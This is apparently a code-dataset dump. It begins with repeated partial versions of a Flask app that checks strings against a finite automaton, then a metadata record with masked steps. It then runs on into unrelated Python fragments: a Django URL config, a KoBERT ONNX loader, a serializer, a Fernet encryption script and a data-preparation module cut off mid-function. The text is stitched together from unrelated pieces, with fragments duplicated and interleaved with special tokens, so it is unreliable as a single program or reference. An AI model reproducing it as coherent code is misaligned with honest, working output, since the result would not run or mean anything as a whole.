@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',
'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
<|reserved_special_token_1|>
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
# Определение константных величин
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',
('H', 'b'): 'SE',
('S', 'b'): 'SE',
('SE', 'a'): 'SE',
('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) -> str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
|
flexible
|
{
"blob_id": "86ea1c46383b5a8790eb187163107f4100395ef3",
"index": 8962,
"step-1": "<mask token>\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-2": "<mask token>\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-4": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-5": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\n\n# Определение константных величин\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',\n ('H', 'b'): 'SE',\n ('S', 'b'): 'SE',\n ('SE', 'a'): 'SE',\n ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) -> str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from .views import TestView, index, setup_fraud_detection, verify_testing_works
urlpatterns = [
path('test/<str:name>/', index, name='index'),
path('ml/setup/', setup_fraud_detection, name='fraud_detection_setup'),
path('ml/verify/', verify_testing_works, name='fraud_verification'),
path('class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class'),
# path('mine/', MyView.as_view(), name='my-view'),
]
|
normal
|
{
"blob_id": "263347d1d445643f9c84e36a8cbb5304581ebaf6",
"index": 3888,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('test/<str:name>/', index, name='index'), path(\n 'ml/setup/', setup_fraud_detection, name='fraud_detection_setup'), path\n ('ml/verify/', verify_testing_works, name='fraud_verification'), path(\n 'class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class')]\n",
"step-3": "from django.urls import path\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .views import TestView, index, setup_fraud_detection, verify_testing_works\nurlpatterns = [path('test/<str:name>/', index, name='index'), path(\n 'ml/setup/', setup_fraud_detection, name='fraud_detection_setup'), path\n ('ml/verify/', verify_testing_works, name='fraud_verification'), path(\n 'class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class')]\n",
"step-4": "from django.urls import path\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .views import TestView, index, setup_fraud_detection, verify_testing_works\n\nurlpatterns = [\n path('test/<str:name>/', index, name='index'),\n path('ml/setup/', setup_fraud_detection, name='fraud_detection_setup'),\n path('ml/verify/', verify_testing_works, name='fraud_verification'),\n path('class/<str:name>/', csrf_exempt(TestView.as_view()), name='test_class'),\n # path('mine/', MyView.as_view(), name='my-view'),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding=utf-8
# Copyright 2019 SK T-Brain Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kobert import download
def get_onnx_kobert_model(cachedir=".cache"):
"""Get KoBERT ONNX file path after downloading"""
onnx_kobert = {
"url": "s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx",
"chksum": "6f6610f2e3b61da6de8dbce",
}
model_info = onnx_kobert
model_path, is_cached = download(
model_info["url"], model_info["chksum"], cachedir=cachedir
)
return model_path
def make_dummy_input(max_seq_len):
def do_pad(x, max_seq_len, pad_id):
return [_x + [pad_id] * (max_seq_len - len(_x)) for _x in x]
input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)
token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)
input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)
position_ids = list(range(max_seq_len))
return (input_ids, token_type_ids, input_mask, position_ids)
if __name__ == "__main__":
import onnxruntime
import numpy as np
from kobert import get_onnx_kobert_model
onnx_path = get_onnx_kobert_model()
dummy_input = make_dummy_input(max_seq_len=512)
so = onnxruntime.SessionOptions()
sess = onnxruntime.InferenceSession(onnx_path)
outputs = sess.run(
None,
{
"input_ids": np.array(dummy_input[0]),
"token_type_ids": np.array(dummy_input[1]),
"input_mask": np.array(dummy_input[2]),
"position_ids": np.array(dummy_input[3]),
},
)
print(outputs[-2][0])
|
normal
|
{
"blob_id": "b6e4214ace89165f6cfde9f2b97fcee8be81f2ed",
"index": 4301,
"step-1": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\nif __name__ == '__main__':\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(None, {'input_ids': np.array(dummy_input[0]),\n 'token_type_ids': np.array(dummy_input[1]), 'input_mask': np.array(\n dummy_input[2]), 'position_ids': np.array(dummy_input[3])})\n print(outputs[-2][0])\n",
"step-4": "from kobert import download\n\n\ndef get_onnx_kobert_model(cachedir='.cache'):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {'url':\n 's3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx',\n 'chksum': '6f6610f2e3b61da6de8dbce'}\n model_info = onnx_kobert\n model_path, is_cached = download(model_info['url'], model_info['chksum'\n ], cachedir=cachedir)\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n\n def do_pad(x, max_seq_len, pad_id):\n return [(_x + [pad_id] * (max_seq_len - len(_x))) for _x in x]\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return input_ids, token_type_ids, input_mask, position_ids\n\n\nif __name__ == '__main__':\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(None, {'input_ids': np.array(dummy_input[0]),\n 'token_type_ids': np.array(dummy_input[1]), 'input_mask': np.array(\n dummy_input[2]), 'position_ids': np.array(dummy_input[3])})\n print(outputs[-2][0])\n",
"step-5": "# coding=utf-8\n# Copyright 2019 SK T-Brain Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom kobert import download\n\n\ndef get_onnx_kobert_model(cachedir=\".cache\"):\n \"\"\"Get KoBERT ONNX file path after downloading\"\"\"\n onnx_kobert = {\n \"url\": \"s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx\",\n \"chksum\": \"6f6610f2e3b61da6de8dbce\",\n }\n\n model_info = onnx_kobert\n model_path, is_cached = download(\n model_info[\"url\"], model_info[\"chksum\"], cachedir=cachedir\n )\n return model_path\n\n\ndef make_dummy_input(max_seq_len):\n def do_pad(x, max_seq_len, pad_id):\n return [_x + [pad_id] * (max_seq_len - len(_x)) for _x in x]\n\n input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)\n token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)\n input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)\n position_ids = list(range(max_seq_len))\n return (input_ids, token_type_ids, input_mask, position_ids)\n\n\nif __name__ == \"__main__\":\n import onnxruntime\n import numpy as np\n from kobert import get_onnx_kobert_model\n\n onnx_path = get_onnx_kobert_model()\n dummy_input = make_dummy_input(max_seq_len=512)\n so = onnxruntime.SessionOptions()\n sess = onnxruntime.InferenceSession(onnx_path)\n outputs = sess.run(\n None,\n {\n \"input_ids\": np.array(dummy_input[0]),\n \"token_type_ids\": np.array(dummy_input[1]),\n \"input_mask\": np.array(dummy_input[2]),\n \"position_ids\": np.array(dummy_input[3]),\n },\n )\n print(outputs[-2][0])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'
<|reserved_special_token_1|>
from rest_framework import serializers
from .models import *
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'
<|reserved_special_token_1|>
from rest_framework import serializers
from .models import *
class VisitaSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Visita
fields = ('id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita')
|
flexible
|
{
"blob_id": "72bbd100a37a86dec7684257f2bec85d7367c009",
"index": 5810,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Visita\n fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'\n",
"step-3": "from rest_framework import serializers\nfrom .models import *\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Visita\n fields = 'id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita'\n",
"step-4": "from rest_framework import serializers\nfrom .models import *\n\n\nclass VisitaSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Visita\n fields = ('id', 'usuario', 'lugar', 'fecha_visita', 'hora_visita')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from os import read
from cryptography.fernet import Fernet
#create a key
# key = Fernet.generate_key()
#When every we run this code we will create a new key
# with open('mykey.key','wb') as mykey:
# mykey.write(key)
#To avoid create a new key and reuse the same key
with open('mykey.key','rb') as mykey:
key = mykey.read()
#print(key)
# f = Fernet(key)
# with open('Mailing Client/password.txt','rb') as original_file:
# original = original_file.read()
# #encrypt the data
# encrypted = f.encrypt(original)
# with open('encryptedpassword.txt','wb') as encrypted_password_file:
# encrypted_file = encrypted_password_file.write(encrypted)
#Decrypt Part
f = Fernet(key)
with open('encryptedpassword.txt','rb') as encrypted_password_file:
encrypte_file = encrypted_password_file.read()
decrypt = f.decrypt(encrypte_file)
with open('decryptedpassword.txt','wb') as decrypted_password_file:
decrypted_file = decrypted_password_file.write(decrypt)
|
normal
|
{
"blob_id": "df828344b81a40b7101adcc6759780ea84f2c6b4",
"index": 4698,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\n<mask token>\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\n<mask token>\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-3": "<mask token>\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\nf = Fernet(key)\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\ndecrypt = f.decrypt(encrypte_file)\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-4": "from os import read\nfrom cryptography.fernet import Fernet\nwith open('mykey.key', 'rb') as mykey:\n key = mykey.read()\nf = Fernet(key)\nwith open('encryptedpassword.txt', 'rb') as encrypted_password_file:\n encrypte_file = encrypted_password_file.read()\ndecrypt = f.decrypt(encrypte_file)\nwith open('decryptedpassword.txt', 'wb') as decrypted_password_file:\n decrypted_file = decrypted_password_file.write(decrypt)\n",
"step-5": "from os import read\r\nfrom cryptography.fernet import Fernet\r\n #create a key\r\n# key = Fernet.generate_key()\r\n\r\n#When every we run this code we will create a new key \r\n# with open('mykey.key','wb') as mykey:\r\n# mykey.write(key)\r\n\r\n#To avoid create a new key and reuse the same key\r\n\r\nwith open('mykey.key','rb') as mykey:\r\n key = mykey.read()\r\n\r\n#print(key)\r\n\r\n# f = Fernet(key)\r\n\r\n# with open('Mailing Client/password.txt','rb') as original_file:\r\n# original = original_file.read()\r\n\r\n# #encrypt the data\r\n\r\n# encrypted = f.encrypt(original)\r\n\r\n# with open('encryptedpassword.txt','wb') as encrypted_password_file:\r\n# encrypted_file = encrypted_password_file.write(encrypted)\r\n\r\n#Decrypt Part\r\n\r\nf = Fernet(key)\r\n\r\nwith open('encryptedpassword.txt','rb') as encrypted_password_file:\r\n encrypte_file = encrypted_password_file.read()\r\n\r\ndecrypt = f.decrypt(encrypte_file)\r\n\r\nwith open('decryptedpassword.txt','wb') as decrypted_password_file:\r\n decrypted_file = decrypted_password_file.write(decrypt)\r\n\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_data():
df = pd.read_csv('./data/filteredCorpus.csv')
df_filt = df[df['outcome'] == True]
df_filt = df_filt[df_filt['role'] == 'speaker']
df_filt = df_filt[df_filt['source'] == 'human']
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
u in utt_filt]
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
str.maketrans('', '', string.punctuation)))
df_final = df.loc[df['contents'].isin(utt_final)]
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors'])
print('length colors and contents', len(df['colors']), len(df['contents']))
print('set colors and contents', len(set(df['colors'])), len(set(df[
'contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents'])
meaning_mat = np.array(meaning_mat)
for i in range(len(meaning_mat[:, 0])):
if sum(meaning_mat[i, :]) == 0:
print('meaning mat is 0 for this row: ', i)
for j in range(len(meaning_mat[0, :])):
if meaning_mat[i, j] == 0:
print('meaning mat is 0 at: ', i, j, ' !!!')
return meaning_mat, colors_le
<|reserved_special_token_0|>
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32).to(device)
output.append([color, utt])
return output
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data():
df = pd.read_csv('./data/filteredCorpus.csv')
df_filt = df[df['outcome'] == True]
df_filt = df_filt[df_filt['role'] == 'speaker']
df_filt = df_filt[df_filt['source'] == 'human']
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
u in utt_filt]
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
str.maketrans('', '', string.punctuation)))
df_final = df.loc[df['contents'].isin(utt_final)]
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors'])
print('length colors and contents', len(df['colors']), len(df['contents']))
print('set colors and contents', len(set(df['colors'])), len(set(df[
'contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents'])
meaning_mat = np.array(meaning_mat)
for i in range(len(meaning_mat[:, 0])):
if sum(meaning_mat[i, :]) == 0:
print('meaning mat is 0 for this row: ', i)
for j in range(len(meaning_mat[0, :])):
if meaning_mat[i, j] == 0:
print('meaning mat is 0 at: ', i, j, ' !!!')
return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32).to(device)
output.append([color, utt])
return output
<|reserved_special_token_1|>
<|reserved_special_token_0|>
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv('./data/filteredCorpus.csv')
df_filt = df[df['outcome'] == True]
df_filt = df_filt[df_filt['role'] == 'speaker']
df_filt = df_filt[df_filt['source'] == 'human']
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
u in utt_filt]
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
str.maketrans('', '', string.punctuation)))
df_final = df.loc[df['contents'].isin(utt_final)]
